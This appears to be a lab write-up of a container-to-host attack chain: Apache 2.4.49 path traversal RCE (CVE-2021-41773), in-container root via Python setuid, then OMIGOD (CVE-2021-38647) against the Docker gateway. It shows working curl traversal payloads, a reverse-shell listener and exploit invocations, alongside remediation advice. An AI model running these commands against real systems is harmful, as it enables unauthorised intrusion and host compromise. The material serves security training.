Case file

Apache 2.4.49 path traversal and OMI host pivot

Intermediate container-to-host engagement: CVE-2021-41773 on Apache 2.4.49 yielded CGI RCE inside a container; CVE-2021-38647 (OMIGOD) against the Docker bridge gateway compromised the host.

Intermediate28 minLinux · Apache · Container · CVE
  • Unauthenticated Apache path traversal executed commands as the web user, then setuid(0) inside the container. Scanning the Docker gateway exposed OMI; OMIGOD RCE returned host root.

  • Version scan pinned Apache 2.4.49. Encoded traversal to /bin/sh via cgi-bin returned command output and a reverse shell.

  • Python setuid(0) inside the container produced a root shell and the container user artifact under /root.

  • From the container we scanned 172.17.0.1 and ran CVE-2021-38647 to execute as root on the host.

01

Engagement summary

Unauthenticated Apache path traversal executed commands as the web user, then setuid(0) inside the container. Scanning the Docker gateway exposed OMI; OMIGOD RCE returned host root.

The target presented Apache httpd 2.4.49. Using CVE-2021-41773 (path traversal through cgi-bin with encoded dot-segments), we executed /bin/sh via CGI and opened a reverse shell. Inside the container, Python os.setuid(0) elevated to container root. We then scanned 172.17.0.1 from the container and exploited CVE-2021-38647 (OMIGOD / OMI) to run commands on the Docker host, recovering the host root artifact.

Business impact

Unpatched Apache 2.4.49 is remote RCE. Containers that can reach a vulnerable OMI endpoint on the host bridge turn a web CVE into hypervisor-adjacent compromise. Patch Apache past 2.4.49/2.4.50, disable unused CGI, and patch or isolate OMI (CVE-2021-38647).

02

CVE-2021-41773 path traversal RCE

Version scan pinned Apache 2.4.49. Encoded traversal to /bin/sh via cgi-bin returned command output and a reverse shell.

OPERATOR · NMAP

savvy@lab:~$ nmap -sSCV 10.10.88.41

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.49

savvy@lab:~$ searchsploit Apache 2.4.49

Apache 2.4.49 - Path Traversal & RCE (CVE-2021-41773)

OPERATOR · TRAVERSAL

savvy@lab:~$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://10.10.88.41/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

savvy@lab:~$ nc -lvnp 4444

# POST bash reverse shell through the same cgi-bin traversal

savvy@lab:/$ id

03

In-container elevation

Python setuid(0) inside the container produced a root shell and the container user artifact under /root.

OPERATOR · SETUID

savvy@lab:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

root@lab:~# hostname

container hostname / limited view

04

OMIGOD pivot to Docker host

From the container we scanned 172.17.0.1 and ran CVE-2021-38647 to execute as root on the host.

OPERATOR · OMIGOD

root@lab:~# nmap -sV 172.17.0.1

# OMI / WinRM-related services reachable on Docker bridge gateway

root@lab:~# python3 CVE-2021-38647.py -t 172.17.0.1 -c 'id; hostname; cat /root/root.txt'

uid=0(root) gid=0(root) groups=0(root)

host root artifact recovered

Remediation

Upgrade Apache to a fixed release; disable CGI if unused. Patch OMI for CVE-2021-38647; do not expose the Docker host management plane to containers; prefer user namespaces and network policies that block bridge-to-host admin ports.